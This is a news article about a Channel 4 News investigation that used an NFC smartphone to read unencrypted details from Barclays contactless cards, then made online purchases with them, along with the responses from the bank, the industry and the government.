One of many ‘next big things’ in the world of technology is the prospect of soon being able to use your mobile phone as a way to pay for things in the real world. The vision of replacing your wallet or purse with a mobile phone capable of handling all of your payment requirements is not a new one. But with smartphones such as Samsung's Galaxy Nexus now being equipped with near-field communication (NFC) hardware – and financial institutions working closely with network operators on infrastructure – it looks like that dream will soon, finally, be realised on a broad scale.
But while NFC technology is making its way slowly onto smartphones, it's already widely used in so-called ‘contactless’ cards; many banks currently issue debit and credit cards with integrated RFID chips, allowing users to make payments for relatively small amounts without needing to go through the hassle of entering a PIN or providing a signature for authorisation. This week, the UK’s Channel 4 News revealed how easy it is to ‘steal’ data from these contactless cards, “using nothing more than an ordinary [NFC-capable] smartphone, and some specially-designed – but devastatingly simple – software”.
Channel 4 worked with security analysts viaForensics on its investigation; the company’s Thomas Cannon explained to correspondent Benjamin Cohen: “All I did was tap my phone over your wallet, and using the wireless reader on the phone, I was able to lift out the details from your card; that includes the long card number, the expiry date and your name. None of it was encrypted, it was simply a case of the details coming out through the air.”
The UK Card Association states that the cardholder’s name should not be among the data that are transmitted. But Barclays, the British bank at the centre of the controversy, insisted that it is “compliant with scheme rules for contactless cards”, adding that “the only information which can be obtained from a chip is the same as that which is printed on the front of the card”.
Barclays further insisted that the bigger issue is with retailers, not all of which impose strict security measures when processing card payments. While contactless payments in person - i.e. where the cardholder physically presents the payment card when making a purchase - are limited to relatively small amounts without authorisation (typically around £15 GBP / $25 USD), once the card details have been surreptitiously scanned, they can be used to make purchases of much larger items online, particularly from those retailers with fewer security checks.
In fact, Channel 4 News was able to use the limited card data swiped by the smartphone – which did not include any PIN data or the card’s CVV/CSC code, displayed on the rear signature strip – to purchase products online from Amazon. C4 News was able to do so using just the cardholder name, card number and expiry date, with no further checks required, even though the account had been set up in a different name to that on the card, with the products also being sent to an address not associated with the card. Amazon did not respond to Channel 4’s requests for comment.
The UK government Department for Business, Innovation and Skills has called for an urgent investigation, calling on Barclays and VISA to "act quickly to address this issue and to cancel and replace cards if necessary". With some 13 million customers already using contactless cards, that could prove rather costly.
While Channel 4 News wasn’t able to use the software to access data from cards issued by other British banks, the weaknesses exposed in what should be a robust and secure system is still a cause for concern, and highlights the work that still needs to be done before we can realistically rely solely on NFC-based payment solutions. It also remains to be seen whether similar vulnerabilities exist with contactless cards issued by banks outside of the UK.
You can watch the full report from Channel 4 News below: